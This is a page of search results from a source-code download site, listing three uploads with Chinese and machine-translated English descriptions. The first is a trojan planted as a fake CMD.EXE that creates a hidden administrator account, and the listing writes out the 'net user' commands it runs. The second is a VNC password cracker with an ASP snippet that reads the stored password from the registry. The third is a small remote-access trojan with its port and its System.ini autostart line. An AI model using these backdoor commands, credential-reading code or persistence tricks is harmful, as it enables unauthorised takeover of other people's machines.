Hot Search : Source embeded web remote control p2p game More...
Location : Home Search - C SHELL
Search - C SHELL - List
你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级
Date : 2008-10-13 Size : 18.5kb User : 姜振

DL : 0
vnc本地口令破解C源代码 默认情况下VNC服务端的密码是放在注册表中的,本工具只针对这种情况。首先用ASP读出注册表中的加密密码,然后用破解工具破解。我给出大家一个读取VNC密码的ASP脚本,默认情况下VNC密码存放在HKCU\\Software\\ORL\\WinVNC3\\Password Set WshShell = server.CreateObject(\"WScript.Shell\") bkey=WSHShell.RegRead(\"HKCU\\Software\\ORL\\WinVNC3\\Password\") for each str in bkey response.write hex(str) next 读取出来后结果类似 49 40 15 F9 A3 5E 8B 22这种十六进制,这是VNC加密的密码。我们可以用vncx4 破解它,vncx4使用很简单,只要在命令行下输入 c:\\>vncx4 -W 然后顺序输入上面的每一个十六进制数据,每输完一个回车一次就行了。-vnc local crack password C source code default under VNC server password is placed on the registry. The tools only address this situation. First ASP registry read out the encryption password, and then use the tool to break the resolve. I have given you a password to read VNC ASP script, By default under the VNC password stored in HKCU \\ Software \\ ORL \\ WinVNC3 \\ P assword Set WshShell = server.CreateObject ( " WScript.Shell ") bkey = WSHShell.RegRead (" HK CU \\ Software \\ ORL \\ WinVNC3 \\ Password ") for eac h str in bkey response.write hex (str) next read out After similar results F9 49 40 15 22 A3 5E 8B this hexadecimal, it is encrypted VNC password. Vncx4 we can resolve it, vncx4 simple to use, as long as the command line input c : \\
Date : 2008-10-13 Size : 4.01kb User : 小李

MiniAsylum 1.1 一个小型木马,服务器端只有5K,功能也相对要少一点,只有上传和远程执行程序功能,不过这就够了,这个木马最大的特点的可以通过代理来访问服务器端。 默认设置 端口:23432 自启动程序:c:\\windows\\wincmp32.exe [System.ini] shell=explorer.exe wincmp32.exe -MiniAsylum a small 1.1 Trojan, the server-only 5K. function relative to small, remote and only upload function implementation procedures, but this is adequate, The Trojan greatest feature of the agent can access the server. Default port : 23432 since the commencement of the proceedings : c : \\ windows \\ wincmp32.exe [System.ini] shell = e xplorer.exe wincmp32.exe
Date : 2008-10-13 Size : 26.54kb User : 21121212
CodeBus is one of the largest source code repositories on the Internet!
Contact us :
1999-2046 CodeBus All Rights Reserved.